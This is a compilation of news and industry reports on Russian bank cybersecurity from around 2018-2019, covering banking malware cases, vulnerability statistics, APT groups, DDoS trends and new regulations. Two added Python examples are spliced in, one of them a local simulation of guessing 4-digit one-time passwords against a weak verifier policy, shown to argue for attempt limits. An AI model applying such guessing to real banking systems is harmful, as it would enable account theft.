According to the press service of the Ministry of Internal Affairs in the Chuvash Republic [8], speaking in May 2019, last spring three complaints from citizens about theft of funds were received almost simultaneously at police stations in the cities of Cheboksary, Novocheboksarsk and Kanash. An unknown person transferred money from their accounts, but the victims received no SMS about the transactions and learned about the incident only after logging into the mobile application. The attacker stole 10 thousand rubles from two citizens, and a resident of Kanash lost 47 thousand rubles.

Department "K" specialists examined the victims' mobile devices and found malware on them that blocked messages from the bank. The malware got onto the phones bundled with popular messengers downloaded from unofficial websites.

A criminal case was opened against the Krasnoyarsk Krai resident under Part 2 of Article 273 of the Criminal Code of the Russian Federation, "Creation, Use and Distribution of Harmful Computer Programs". According to the Ministry of Internal Affairs, he had previously been prosecuted under Article 138.1 of the Criminal Code of the Russian Federation, "Illicit Trafficking in Special Technical Means Intended for Covertly Obtaining Information".

The suspect is now under a recognizance not to leave. The damage caused to the victims has been fully compensated.

Positive Technologies: all online banks are exposed to the threat of unauthorized access to bank secrecy

On April 5, 2019 Positive Technologies reported that its experts had assessed the security of online banks in 2018 and found that 54% of the systems examined allow attackers to steal money, and that all online banks are exposed to the threat of unauthorized access to personal data and bank secrecy. According to the analysis, most of the online banks studied contain critically dangerous vulnerabilities. The security assessment found vulnerabilities that could lead to serious consequences in every system studied.

Median number of vulnerabilities in one online bank

The threat of unauthorized access to customer information and bank secrecy, for example to other users' account statements or payment orders, was relevant for every online bank studied, and in some cases the vulnerabilities allowed an attack to be developed against the bank's corporate network. Positive Technologies research shows that such data is among the most popular goods for sale on the dark web. More than 80% of the total volume of data on sale consists of credentials and bank card data. The average price of one online banking user's data is 22 US dollars.

Possible effects of the attacks to online banks (share of applications)

During the analysis, flaws in the implementation of two-factor authentication mechanisms were detected in 77% of the online banks examined. According to Positive Technologies analyst Yana Avezova, in some online banks one-time passwords are not applied to critical actions (for example, to authentication) or have too long a validity period. Experts attribute this to banks trying to strike a balance between security and usability.

Level of security of online banks (share of systems)
Dropping even some of the security measures for the sake of convenience increases the risk of fraudulent transactions. If a transaction does not need to be confirmed with a one-time password, the attacker no longer needs access to the victim's mobile phone, and too long a password lifetime increases the chance of guessing it successfully: without limits on guessing attempts, a four-character one-time password can be picked in just a few minutes, noted Yaroslav Babin, head of the banking systems security research group at Positive Technologies.
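The attempt-limit and validity-period problem Babin describes, as an added example that is not from Positive Technologies or the page: a small server-side OTP gate whose policy is switched from the weak settings (4 digits, 10-minute lifetime, unlimited attempts) to hardened ones, plus a guessing simulation that shows why only the weak configuration falls. The 50-guesses-per-second attacker speed, the sample codes and all names here are assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass(frozen=True)
class OtpPolicy:
    """The three parameters that decide how long a guessing attack can run."""
    digits: int
    ttl_seconds: int   # validity period of one code
    max_attempts: int  # wrong guesses allowed per code; 0 = unlimited


@dataclass
class Challenge:
    code: str
    issued_at: float
    attempts: int = 0


class FakeClock:
    """Injected clock so the example runs offline and the simulation
    can advance time per guess instead of sleeping."""
    def __init__(self) -> None:
        self.now = 0.0

    def __call__(self) -> float:
        return self.now


class OtpVerifier:
    def __init__(self, policy: OtpPolicy, clock) -> None:
        self.policy = policy
        self.clock = clock
        self._pending: Dict[str, Challenge] = {}

    def issue(self, tx_id: str, code: Optional[str] = None) -> str:
        # code= exists only for deterministic demos/tests; a real bank always
        # generates the code and delivers it out of band (SMS, push), never
        # returning it to the caller that will later present the guess.
        if code is None:
            code = "".join(str(secrets.randbelow(10))
                           for _ in range(self.policy.digits))
        self._pending[tx_id] = Challenge(code=code, issued_at=self.clock())
        return code

    def verify(self, tx_id: str, guess: str) -> str:
        """Returns 'ok', 'wrong', 'expired' or 'locked'. An expired or locked
        challenge is discarded, so the same code can never be retried."""
        ch = self._pending.get(tx_id)
        if ch is None:
            return "wrong"
        if self.clock() - ch.issued_at > self.policy.ttl_seconds:
            del self._pending[tx_id]
            return "expired"
        if self.policy.max_attempts and ch.attempts >= self.policy.max_attempts:
            del self._pending[tx_id]
            return "locked"
        ch.attempts += 1
        # constant-time comparison: the verifier must not leak prefix matches
        if hmac.compare_digest(ch.code.encode(), guess.encode()):
            del self._pending[tx_id]  # single use
            return "ok"
        return "wrong"


def simulate_guessing(policy: OtpPolicy, true_code: str,
                      guesses_per_second: float) -> Tuple[str, int, float]:
    """Enumerate every code in order against one fresh challenge and report
    (outcome, guesses submitted, simulated seconds elapsed)."""
    clock = FakeClock()
    verifier = OtpVerifier(policy, clock)
    verifier.issue("tx-1", code=true_code)
    space = 10 ** policy.digits
    for n in range(space):
        result = verifier.verify("tx-1", str(n).zfill(policy.digits))
        if result != "wrong":
            return result, n + 1, clock.now
        clock.now += 1.0 / guesses_per_second
    return "exhausted", space, clock.now


WEAK = OtpPolicy(digits=4, ttl_seconds=600, max_attempts=0)
HARDENED = OtpPolicy(digits=6, ttl_seconds=60, max_attempts=5)

if __name__ == "__main__":
    # Assumed attacker speed: 50 guesses/s (a modest rate for an unthrottled API).
    for name, policy, code in (("weak", WEAK, "7351"),
                               ("hardened", HARDENED, "007351")):
        outcome, guesses, elapsed = simulate_guessing(policy, code, 50)
        print(f"{name:8s}: {outcome:8s} after {guesses} guesses, {elapsed:.1f}s")
```

With the weak policy the whole 4-digit space (10,000 codes) is covered in 200 s, well inside the 10-minute lifetime, so the guess always succeeds; the hardened policy refuses the sixth submission and the short lifetime alone would stop an unthrottled attacker after about 3,000 guesses.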

A comparative analysis showed that the off-the-shelf solutions offered by vendors contain three times fewer vulnerabilities than systems developed by banks in-house. The number of vulnerabilities in production and test systems has evened out: statistically, in 2018 both types of systems in most cases contained at least one critically dangerous vulnerability. Experts attribute this to the fact that developers, having once tested a system for security, tend to postpone repeated security analysis after changes to the code, which inevitably leads to an accumulation of vulnerabilities; over time their number becomes comparable to what was found in the initial check.

The main positive trend in the security of online financial applications in 2018 was a reduction in the share of high-risk vulnerabilities among all the flaws found. According to Positive Technologies specialists, the share of critically dangerous vulnerabilities halved compared to 2017. Overall, however, the security level of online banks remains low.

Shares of vulnerabilities of different risk level

75% of banks are vulnerable to social engineering attacks

On July 5, 2019 Positive Technologies presented aggregated data on the main types of computer attacks in the credit and financial sphere for 2018. The document was prepared by specialists of FinCERT of the Bank of Russia together with the leading Russian companies in the field of information security incident investigation.

Assessing the security of the industry, Positive Technologies experts noted that three quarters of banks are vulnerable to social engineering attacks. In 75% of banks employees follow links in phishing emails, in 25% they enter their credentials into a fake authentication form, and in 25% of financial institutions at least one employee opens a malicious attachment on a work computer. Phishing is used at the penetration stage by nine out of ten APT groups.

The security of banks' internal networks is also far from perfect. The most frequent server configuration problems are late software updates (67% of banks) and storage of sensitive data in plain form (58% of banks). Dictionary passwords are used in more than half of the banks examined. During penetration tests Positive Technologies specialists managed to gain control of ATMs from the internal network in 25% of banks.

The security level of mobile applications is low: high-risk vulnerabilities were detected in 38% of iOS applications and 43% of Android applications. Insecure data storage, which can lead to leaks of passwords, financial information and users' personal data, was found in 76% of mobile applications.

Positive Technologies experts emphasize the efficiency of APT groups, which quickly adopt newly available opportunities. For example, the Cobalt group sent out a malicious mailing within 34 hours of the publication of information on the zero-day vulnerability CVE-2018-15982. In total, in 2018 this group carried out 61 mailings against credit and financial organizations in Russia and the CIS countries.

Another APT group, RTM, with 59 mailings in 2018, used domains in the decentralized, censorship-resistant .bit zone as one of its command centers. However, the architecture of the blockchain played against the attackers: PT Expert Security Center specialists developed an algorithm for tracking the registration of RTM domains (or changes of their IP addresses), which makes it possible to notify banks of newly appeared control servers within minutes of the attackers starting to use them (and sometimes even before the malicious mailing).

Despite the overall growth in the number of attacks in 2018, the financial damage decreased considerably compared to the previous year. This is largely due to information exchange within the industry, in particular the launch of FinCERT's automated incident processing system (ASPI). According to FinCERT data, the damage to Russian credit and financial organizations from Cobalt group attacks in 2018 was at least 44 million rubles, and from Silence group attacks at least 14.4 million rubles. In total, over the year FinCERT received data on 590 attacks on credit and financial organizations, including 177 targeted attacks.

Although FinCERT's information exchange system has reduced banks' losses, the danger of targeted attacks remains high. APT groups constantly improve their attack techniques, raise the quality of their mailings, monitor vulnerability publications, buy zero-day vulnerabilities and add them to their arsenal within hours. Credit and financial organizations can no longer regard the traditional construction of protective barriers as paramount. The situation has changed: criminals have learned to bypass antiviruses, sandboxes and IDS systems. Banks should accept that a hypothetical attacker is already inside their perimeter; the main task is to minimize the time of their presence in the IT infrastructure and deprive them of the ability to act.

Qrator Labs: more than 55% of banks noted an increase in their cybersecurity budget since 2016

On March 5, 2019 Qrator Labs, a company specializing in DDoS attack mitigation and ensuring the availability of Internet resources, presented the results of a study of information security in the financial sector in 2018. The survey was conducted among banks and payment systems operating in Russia. The sample includes banks from the TOP-200 rating by assets.

Qrator Labs noted that the number of cyberattacks on the banking sector continues to grow, both globally and in Russia, while the attacks become technically more and more sophisticated. The largest players in the industry report a 1.5-2x growth in the number of attempted incidents relative to the same period of 2017. Understanding of the scale of the problem and the risks stimulates most banks to increase investment in security systems.

55.3% of the respondents participating in the study noted an increase in their cybersecurity budget over the two years since 2016. A further 35.3% of respondents increased the budget in 2017, and 10.6% of respondents adapted their cybersecurity budget to the growing threats continuously over the two years (2016-2018).

More than half of respondents name financial costs among the most significant consequences of cybersecurity incidents, and about half name reputational damage. An increased risk of license revocation is noted by a third of respondents (about a quarter the previous year).

The reaction of financial institutions to the European data protection regulation is noteworthy. About a quarter of the banks polled note that in 2018 their systems were already brought into compliance with the GDPR (General Data Protection Regulation), and about a third more plan to do so within the next year.

"Considering that the GDPR requirement is not imposed by Russian legislation, i.e. it does not entail sanctions or revocation of a license by the Central Bank, the fact that a quarter of banking systems already meet the European regulation's standards speaks to the high priority banks place on working with clients holding European passports. Most importantly, we see that banks continue to take legally mandated security seriously in all its forms."

Their insufficient level of protection against the growing threats, as confirmed by pentests or already recorded incidents, drives respondents to replace previously deployed cybersecurity tools (62% of respondents, 53% the previous year). 31% see such a need when moving to other infrastructures (clouds and so on) where the solutions in use stop being effective (more than a quarter the previous year).

When choosing a WAF (web application firewall) solution, 68% of respondents are guided by real technical tasks: from protection against zero-day attacks to security control of frequently updated code. For a third of respondents the key factor is formal compliance with the PCI DSS standard.

More than half of respondents in the financial sector note that the level of DDoS threats grew in 2018 (a similar result was recorded the previous year). According to about a quarter more of the respondents, the number of attacks remained unchanged over the same period (more than a third the previous year).

More than half of respondents also say that they faced DDoS attacks in the last year (26% the year before). Besides DDoS, the financial sector companies polled most often face phishing (46%). More than a third claim they avoided cybersecurity incidents in the last year.

"Among the reasons that could have provoked such growth is the sharp fall in the rates of all cryptocurrencies. DDoS attacks remain one of the simplest ways to monetize malware, whether infected servers or botnets built from personal computers and phones. In 2017 attackers could profitably use botnets and compromised servers for cryptocurrency mining. As is known, the main cost of mining is electricity, and if access to a computer is obtained illegitimately, the attacker does not have to pay for energy and receives cryptocurrency 'out of thin air' regardless of volume. In 2018, due not only to the fall in exchange rates but also to the categorical instability of cryptocurrency rates, the 'good old' methods of earning from botnets regained a certain attractiveness for attackers: carrying out attacks for the purpose of extortion."

Artem Gavrichenkov, technical director of Qrator Labs

Most respondents (65%) consider hybrid solutions (an on-premises solution on the client side combined with an operator's solution, or a distributed network) the most effective means of countering DDoS.

As Qrator Labs notes, the growth in the number of banks engaging external solutions for protection against attacks is also largely connected with the increased threat level in 2018 and the growth in the number of high-bandwidth DDoS attacks using amplification via memcached, LDAP amplification, attacks using the CoAP protocol (Constrained Application Protocol) and so on.

Group-IB: more than 70% of banks are not ready to resist cyberattacks

On February 19, 2019 Group-IB, an international company specializing in the prevention of cyberattacks, analyzed the high-tech crimes of 2018 to which its forensic experts responded. According to the study, the bulk of hacker attacks traditionally fell on the financial sector; 74% of banks were not ready for cyberattacks, active malware infections were detected in 29%, and in 52% of cases traces of past attacks were found. Among the dangerous trends of 2018 are cross-border attacks that start a "chain reaction" leading to multiple infections of financial institutions. In 2018 the Group-IB incident response team recorded the use of this vector both in Russia and in Eastern Europe.

The total number of incident responses by the Group-IB computer forensics laboratory more than doubled relative to 2017. The main threats faced by the affected companies were targeted attacks, competitive espionage, ransomware attacks and cryptomining. The main finding of Group-IB's forensic experts: the vast majority of Russian companies that fell victim to hacker attacks in 2018 had no cyberincident response plan, were not ready to mobilize their operating units quickly, and were organizationally and technically incapable of resisting the attackers. Group-IB experts point to a high probability of repeat incidents at such companies.

Risk group: banks are not ready to repel a cyberattack

According to the Group-IB study, about 70% of hacker activity in 2018 targeted banks. The hackers' cash-out schemes remained the same: through bank cards opened in advance for cashing out, accounts of shell companies, payment systems, ATMs and SIM cards. At the same time, the speed of cashing out in Russia grew several times: if 3 years ago withdrawing 200 million rubles took about 25-30 hours on average, then in 2018 the company encountered a case where the same amount was cashed out in less than 15 minutes, at once, in different cities of Russia.

Analyzing the data obtained during incident responses, the experts concluded that 74% of the banks attacked in 2018 were not ready for hacker attacks: more than 60% are unable to manage their network centrally, especially in a geographically distributed infrastructure; about 80% do not keep event logs for longer than a month; more than 65% spent more than 4 hours on approving work between divisions. The average number of hours spent on meetings, access approvals and scheduled work within one response to an incident was 12 hours.

Chain reaction

The Group-IB study reveals not only inconsistency in the work of internal divisions and poorly developed organizational procedures for establishing the source of an infection, the scale of a compromise and localizing an incident, but also insufficient technical training of bank staff. According to the company, skills in searching for signs of infection and unauthorized network activity are absent or insufficient among the personnel of 70% of organizations. As many lack clear procedures for independently identifying compromised hardware and software. Technical specialists' inability to react quickly to an incident carries high risks: more than 60% of affected banks are unable to carry out a centralized one-time change of all passwords in a short time, which allows hackers to attack new targets from inside the compromised bank infrastructure.

A bank whose infrastructure has been compromised can not only lose money but also become a threat to other players in the financial market. When attacking a target, a financially motivated hacker group aims to gain maximum benefit: having gained control over the bank's systems, it is interested not only in withdrawing money from it but also in infecting the maximum number of victims. To this end a "domino effect" is started: malicious mailings go out from the compromised infrastructure to the lists of the bank's partner companies. This vector is dangerous primarily because the letters come from a real bank, i.e. the sender is not forged, which increases the probability that they will be opened at the partner bank. Thus a chain reaction starts that can lead to multiple infections of financial institutions. In 2018 we recorded the use of this vector both in Russia and in Eastern Europe.
Valery Baulin, head of the computer forensics laboratory at Group-IB

"Double bottom" of a cyberattack

According to Group-IB, at least 17% of the companies where incident response was carried out suffered repeat exploitation of previously unpatched vulnerabilities within a year of the last infection. In most cases this turned out to be a consequence of failure to follow the recommendations on remediating the cyberincident, as well as negligence on the part of bank staff. In addition, during 2018 Group-IB experts detected active infections, of which the internal information security service had previously been unaware, in 29% of financial sector organizations. In 52% of cases traces of past attacks were found.

In 2018 the Group-IB incident response team recorded cases where a cyberincident created a sharply negative background around a bank, which provoked an information attack, reputational losses and, in some cases, exit from the market.

A negative background is created around the bank, intentionally or after the fact: estimates of potential damage, an unacceptably low level of protection, probable revocation of the license. This leads to an outflow of clients and partners, and the bank faces insufficient capitalization. The use of a cyberattack as a tool for inflicting reputational damage and pushing a competitor out of the market is another dangerous vector that could develop further, as the level of cybersecurity of small banks still remains extremely low.
Valery Baulin, head of the computer forensics laboratory at Group-IB

The situation on the bank information security market in 2018

Business process automation in the banking sector has gone beyond the standard solutions familiar to banks, such as core banking systems or RBS (remote banking services), i.e. systems for automating banking operations or remote customer service. More and more tasks of optimizing atypical processes are being entrusted to information technology using new mathematical models and algorithms: automation of the management of various types of risk, claims and litigation work, anti-fraud solutions, etc.

When implementing a digital transformation strategy, a high-tech bank becomes much more vulnerable to cyberthreats, believes Dmitry Livshits, CEO of Digital Design. Therefore the purpose of automation is no longer only to reduce operating costs by speeding up internal processes or to provide new services to clients.

Information security comes to the fore, and I believe that in the next two years this direction will keep its lead among the trends in bank informatization, he notes.

Maxim Bolyshev, associate director of the RS-Bank banking software department at R-Style Softlab, says that the banking sector is now under close attention from the Central Bank in connection with increasingly frequent cyberattacks targeting not only bank clients but also banks themselves. In this regard the Bank of Russia is developing cybersecurity requirements (for example, 382-P or 552-P) and insisting on their fulfilment. The Central Bank also organizes information exchange between banks and FinCERT for collective defense against cyberthreats.

Vladimir Volkov, senior vice president of Technoserv, believes that the financial sector is the trendsetter in information security, a reference point for the rest of the market. Banks are a tidbit for cybercriminals of varying skill levels and an opportunity to quickly monetize their skills and abilities.

A large number of regulatory requirements in the field of information security apply to the banking sector, from the traditional international PCI DSS and SOX to the new mandatory requirements issued over the last year by the Central Bank of the Russian Federation and SWIFT. Let me remind you that work with FinCERT began first, and only now are all other industries beginning to connect to GosSOPKA, the state system for countering computer attacks. Sberbank is building perhaps the largest corporate Security Operations Center (SOC) in the world; the fight against cybercrime is conducted daily, as attackers constantly find new methods of attacking banks, says Vladimir Volkov.

Another key segment for banks is ensuring so-called "real" security.

Banks' understanding of the problems in protecting their information systems and of the existence of logical holes preserves not only the bank's money but also its reputation. Technoserv can offer banks protection against cyber threats, including technologies such as sandboxes, protection against targeted attacks, and the creation of a SOC with special emphasis on methodology and processes (for example, incident response and vulnerability management), - he adds.

Banks are in an interesting situation: on the one hand, they need to bring new online products to market quickly and constantly change their IT infrastructure so as not to fall behind the market; on the other, they must ensure a high level of security. The main challenge for cyber security services is finding and keeping this balance.

The widespread solution to this problem is to form standard information security services that are convenient for both IT and business to use, and to involve these units strongly in cyber security matters, - says Vadim Shustov, deputy CEO of Jet Infosystems.

According to him, in terms of cyber security regulation the pressure on the financial sector in Russia is among the strongest, but the regulator is also clearly the most advanced in this area.

Its requirements are not a mere formality: they are really dictated by the sad examples of hacked banks. As a result, the requirements become tougher every year, and their fulfilment, especially for small credit institutions, becomes an ever more monumental task, - Shustov believes.

Anatoly Naboka, director of corporate customer relations at System Software, believes that from a security standpoint the greatest interest now lies in EDR solutions, systems for detecting incidents on workstations with the ability to respond to them quickly. New interesting players are appearing in this segment of the Russian market: for example, Carbon Black is now entering the market with predictive cyber security systems that combine the functionality of EDR, an antivirus, a managed threat hunting and triage system, and data center security solutions.

Banks are interested in such tools because they apply a proactive approach: EDR collects and analyzes large volumes of data and helps prevent new types of attacks that attackers have not used before. This means a level of cyber defense that gives a financial institution an obvious competitive advantage, - Anatoly Naboka notes.

Russians given long prison terms for stealing money from Internet banks

In Moscow, the trial of a gang of cybercriminals who hacked citizens' personal accounts at banks and then withdrew various sums of money from them has ended[9][10].

In total, about 30 episodes fall under several articles of the Criminal Code: creation, use and distribution of malicious computer programs, unlawful access to computer information, and fraud in the field of computer information. The group consisted of two leaders and four accomplices, all of whom received different terms.

"Brothers Dmitry and Evgeny Popelysh were sentenced to eight years in a penal colony with a fine of 900 thousand rubles each; three more received sentences of four and a half to six years in a colony with fines of up to 700 thousand rubles. They will serve their sentences in a standard-regime penal colony. One more defendant was given a three-year suspended sentence but was amnestied", - said Maria Mikhaylova, press secretary of the Savelovsky Court.

Information security problems of banks

The level of information security in the Russian banking sector is rising. With the emergence of a large number of cyber threats, organizations in the financial sphere are moving from "paper" security to a real, layered approach based on risk assessment. In 2017 the number of cyber security incidents in the financial sphere more than doubled compared with the previous year. Attacks target both clients, individuals and legal entities alike, and banks and payment systems.

Low level of cyber security culture

The high share of successful attacks is connected first of all with the low level of information security culture both among clients and among bank employees.

Neglect of the basic rules of cyber hygiene entails risks, for example of social engineering, a tool of cyber fraud that can also serve as the beginning of a large-scale cyber attack, - explains Maria Voronova, head of consulting at InfoWatch Group.

According to her, the solution to this problem is helped by high-quality regulation of information security matters in the industry: on January 1, 2018 a new GOST on information security of financial institutions came into force. The standard offers a comprehensive approach to planning, implementing, controlling and improving the information security process in financial institutions.

Andrey Gridin, head of the information security solutions department at FORS Development Center (FORS Group), believes that employees must be informed of the importance of security, instructed in the fundamentals of cyber security with examples from practice, held personally liable, and, if necessary, administrative resources must be brought to bear.

Sergey Sherstobitov, CEO of Angara Technologies Group, holds a similar opinion. According to him, loss of confidential data is, as a rule, connected not with "holes" in IT systems or imperfect technical protection tools but with the human factor, so special attention should be paid to training personnel in information security and to raising cyber security awareness.

Anton Golovaty, director of business development at LANIT-Integration, adds that more and more of our data is held by financial institutions. At the same time, as the number of joint platforms grows, the amount of personalized data held by banks and their partners will only grow, and the information will become even more detailed. Therefore the question of protecting personalized data will be even more relevant in the future, he is sure.

Alexey Trefilov, director of ELMA, speaks about the danger that lies in wait for clients.

Convenient banking services have become habitual for everyone. Paradoxically, the convenience and availability of banking services make us more careless. If everyone around us constantly uses a phone to pay for services and to check the account balance, then it seems completely safe to us too. That is why it is very easy to lose vigilance and, for example, accidentally allow some game on the phone to read your SMS messages, including those from the bank, - he explains.

Phishing and DDoS attacks

According to research by Qrator Labs, companies in the financial sector most often face phishing (30%) and DDoS attacks (26%).

Weak interaction between cyber security and IT specialists

As a rule, when new systems are created or existing ones are upgraded, cyber security specialists do not take part in the design process but only "approve the documentation"; information protection is limited to placing the equipment in a protected segment, providing network access and differentiating user rights, and after the system goes live, security tools are "hung" on it. As a result, performance problems begin, says Andrey Gridin, head of the information security solutions department at FORS Development Center (FORS Group).

According to him, the solution requires that requirements for integration and interaction with cyber security system components be clearly formulated. IT specialists must be instructed regularly in applying and implementing these requirements. Mandatory inclusion of a cyber security specialist in the project team at the design or upgrade stage of a system should also be regulated.

Protection of mobile workplaces

According to experts, ensuring security at the level of the mobile application is no longer enough. When a personal device becomes a full-fledged workplace for employees, a broader but no less reliable method of data protection is needed.

Dmitry Livshits, CEO of Digital Design, says that to address this problem his company developed a solution that lets any corporate application of the customer be placed into a protected environment, a so-called secure container. In it, any application can be used on a personal device without worrying that information will leak outside.

Integration of the application into the "container" is implemented by "wrapping": the standard file, local database and network libraries used by the application are automatically replaced with their encrypting analogs, - he explains.

Security of mobile and Internet banking

Maxim Nikitin, vice president of Maykor and CEO of BTE, notes that in the banking sector the security problem of mobile and Internet banking has not lost its relevance, owing to an insufficient level of data encryption and the possibility of running the mobile application on public Internet networks where the probability of traffic interception is high.

The solution lies on the surface and consists in developing and deploying improved encryption systems and in testing applications for possible attacks in a public place, - he explains.

Non-certified information security tools

Banks have found that they cannot increase resources indefinitely to process the huge and daily growing data arrays. It makes sense to move part of the data to the cloud, which can serve not only the centralized resources concentrated in the data center but also, at a minimum, end-user workstations.

Therefore the relevance of moving to the cloud is growing, but only in compliance with the Bank of Russia standards and other regulatory documents on information protection requirements, notes Mikhail Golovachev, CEO of Amtel-Service. At the same time, the problem, according to him, is that many modern cyber security tools are not certified for compliance with information protection requirements.

The big money of cyber crime

Cyber crime is a huge, well-organized business that operates with billions of dollars worldwide every year. Antivirus software and information protection technologies do not always protect, because hacker technologies are constantly improving, just as the tools for protection against cyber attacks are.

The main problem is that the financing of cyber crime is 10 times greater than the financing of the companies that fight it. The result is continued growth of the capabilities of IT criminals and an escalating need for new IT security technologies. In general, information security staff will remain valuable personnel for credit institutions for a long time to come, - notes Alexey Kolesnikov, sales director of iSimpleLab.

Yury Goltser, technical director of the CRM department at Navicon, adds that mechanisms for protecting client data are constantly being improved, including the development of the latest encryption algorithms.

In 2017 testing of quantum encryption tools began: the Russian Quantum Center (RQC) launched Russia's first quantum-protected communication line between two Sberbank offices. Now experiments on applying quantum computers to data security are being closely watched by developers of blockchain projects. In addition, banks see prospects for protection against cyber crime in creating universal mechanisms for joint work with governments and law enforcement agencies. According to market participants, to make the markets, tools and systems of cybercriminals ineffective, it is first of all necessary to establish communication between the banking systems of different countries, - says the Navicon representative.

He also recalls that at the beginning of the year the American banks and online lenders Citigroup, Kabbage, Depository Trust & Clearing Corporation, Hewlett Packard and the Swiss Zurich Insurance Group announced the creation of a fintech cyber security consortium that will be managed by the World Economic Forum.

We see similar initiatives worldwide. For example, the British office of Lloyds is joining Barclays, Deutsche Bank, Santander UK and Standard Chartered, which have united in the Cyber Defence Alliance. The tendency toward consolidation against a common threat will only grow, - Yury Goltser is sure.

The Ministry of Justice obliged banks to commission pentests and cyber security audits

Banks will be obliged to observe new cyber security measures, among which are a mandatory information security audit, various penetration tests (pentests), and mandatory certification of the software used. The document was signed in the summer of 2018 by the Ministry of Justice of the Russian Federation. Naturally, compliance with these requirements will place a financial burden not only on the shoulders of banks but also on those of their clients. Thus the amendments to Central Bank regulation 382-P have finally taken their final form and been registered by the Ministry of Justice. On June 26 the Central Bank sent this document to banks. Credit institutions must now use software certified by FSTEC.

Experts believe that in some cases banks do not pay due attention to certification, which leads to the subsequent discovery of vulnerabilities in software. Only those financial institutions with strong cyber security specialists on staff can afford security analysis. Under the document, pentests will now be carried out annually, and every two years credit institutions must undergo an external cyber security audit. The main concern in this situation is the growth of expenses. The Central Bank considers that the expenses will not be excessive.

Banks of the Russian Federation gain the ability to block money withdrawal operations through RBS systems

On June 5, 2018 the State Duma of the Russian Federation approved in the third reading a government bill aimed at countering the theft of money during transactions carried out via remote banking service (RBS) systems.

The document sets the procedure for banks upon detecting signs of illegitimate transactions, i.e. money transfers made without the authorization and consent of the account holder. If signs of a money transfer without the client's consent are detected, the bank or money transfer operator is obliged to suspend execution of the order for no more than two working days and to block the electronic means of payment for the same period.

These signs are defined by the Central Bank of the Russian Federation. In addition, banks are to be granted the right to take similar actions upon detecting additional signs of a money transfer without the payer's consent; banks will have the right to set these additional signs independently, in accordance with Central Bank requirements.

After suspending the money transfer and blocking the electronic means of payment, the bank will be obliged to request confirmation from the client without delay that the payment order may be executed (that use of the electronic means of payment may be resumed). On receiving the client's confirmation, the bank will be obliged to execute the order (resume use of the electronic means of payment) without delay; if no confirmation is received, it must do the same after two working days.
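The suspend-confirm-resume procedure above, as an added example (not code from the bill, the Central Bank or any bank): a small model of the hold lifecycle. The indicator list (a payee found in a fraud database, an unknown device, an atypical amount), the account numbers, the client profile and the five-times-typical threshold are all hypothetical stand-ins; the page does not reproduce the Central Bank's actual list of signs, and public holidays are ignored in the working-day count.

```python
"""Added example, not from the article: a model of the procedure for a
transfer that shows signs of being made without the client's consent.
All indicators, thresholds and account data are hypothetical."""
from dataclasses import dataclass
from datetime import date, timedelta

# Hypothetical stand-in for the Central Bank's database of reported cases.
KNOWN_FRAUD_PAYEES = {"40817810000000000099"}   # constructed sample value
HOLD_WORKING_DAYS = 2                           # "no more than two working days"


@dataclass
class ClientProfile:
    known_devices: set          # device ids the client has used before
    typical_amount: float       # constructed: median of recent transfers


@dataclass
class Transfer:
    payee_account: str
    amount: float
    device_id: str


@dataclass
class Hold:
    transfer: Transfer
    indicators: list
    deadline: date              # last day the order may stay suspended
    status: str = "held"        # "held" or "executed"
    instrument_blocked: bool = True


def add_working_days(start: date, n: int) -> date:
    """Count n working days (Mon-Fri) forward; holidays are not modelled."""
    d = start
    while n > 0:
        d += timedelta(days=1)
        if d.weekday() < 5:
            n -= 1
    return d


def detect_indicators(tx: Transfer, profile: ClientProfile) -> list:
    """Hypothetical signs: one from a regulator-supplied database plus two
    bank-defined additional signs, as the bill allows."""
    found = []
    if tx.payee_account in KNOWN_FRAUD_PAYEES:
        found.append("payee_in_fraud_database")
    if tx.device_id not in profile.known_devices:
        found.append("unknown_device")
    if tx.amount > 5 * profile.typical_amount:
        found.append("atypical_amount")
    return found


def evaluate_transfer(tx: Transfer, profile: ClientProfile, today: date) -> Hold:
    """No signs: execute at once. Any sign: suspend the order and block the
    payment instrument until the two-working-day deadline."""
    indicators = detect_indicators(tx, profile)
    if not indicators:
        return Hold(tx, [], today, status="executed", instrument_blocked=False)
    return Hold(tx, indicators, add_working_days(today, HOLD_WORKING_DAYS))


def resolve_hold(hold: Hold, confirmation_received: bool, today: date) -> Hold:
    """Client confirmation executes the order immediately; without it the
    order is executed and the instrument unblocked once the deadline passes.
    The page describes only these two outcomes, so nothing else is modelled."""
    if hold.status == "held" and (confirmation_received or today >= hold.deadline):
        hold.status = "executed"
        hold.instrument_blocked = False
    return hold


if __name__ == "__main__":
    profile = ClientProfile(known_devices={"dev-A"}, typical_amount=10_000)
    tx = Transfer("40817810000000000099", 200_000, "dev-B")   # constructed
    hold = evaluate_transfer(tx, profile, date(2018, 6, 29))   # a Friday
    print(hold.status, hold.indicators, hold.deadline)         # held [...] 2018-07-03
```

Deadline arithmetic is where such logic usually goes wrong in practice: a hold opened on a Friday must run to Tuesday, not Sunday, and the bank may not keep the order suspended past that point without the client's answer.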

In addition, a special procedure is introduced for the bank to return money to its legal owner in the event of an unauthorized debit from a customer account. This procedure is intended only to protect legal entities: for individuals, the refund procedure was established by an earlier law.

The bill establishes the powers of the Central Bank to form and maintain a database of cases of money transfers made without the client's consent, and to determine the procedure by which money transfer operators, payment system operators and payment infrastructure operators send information to and receive it from this database.

The banking system around the world suffers enormous losses from the actions of cyber fraudsters stealing funds from the accounts of individuals and organizations, - noted Dmitry Gvozdev, CEO of Information Technologies of the Future. - Attackers constantly improve the tools they use for theft, but illegitimate transactions always have certain indicators by which they can be identified. The proposed bill regulates the procedures that must be followed when there is a suspicious transaction. The only question so far is how competently the lists of signs of such transactions will be drawn up, at the level of the Central Bank and of individual banks.

The document will take effect 90 days after the day of its official publication; apparently it will already be in force in the fall of 2018.[11]

The ECB will engage hackers to check the cyber security of the financial sector

In May 2018 the European Central Bank (ECB) announced the launch of a cyber security testing program for the banking system. According to Kommersant, citing the bank's statement, systems will be tested by staff employees as well as by specially hired teams of hackers who will try to find weaknesses by simulating real hacking attempts.

The project is called the European Framework for Threat Intelligence-based Ethical Red Teaming (TIBER-EU). The program is advisory in nature: the ECB emphasizes that EU Member States can decide when and how to conduct checks of financial institutions.

During the tests it is proposed to use "the full range of methods used by real hackers". In particular, the ECB suggests subjecting the critical systems of financial institutions to simulated cyber attacks.

Based on the results of the checks, recommendations will be made on improving the security system of a particular financial institution, the ECB specified. At the same time, the explanatory notes to the TIBER-EU program say that "the authorities will recognize the tests as passed only if not only internal specialists but also outside parties participate in them".

Positive Technologies: bank web applications are the most vulnerable

Specialists at Positive Technologies prepared statistics on vulnerabilities in web applications that were examined during automated security analysis with PT Application Inspector in 2017.

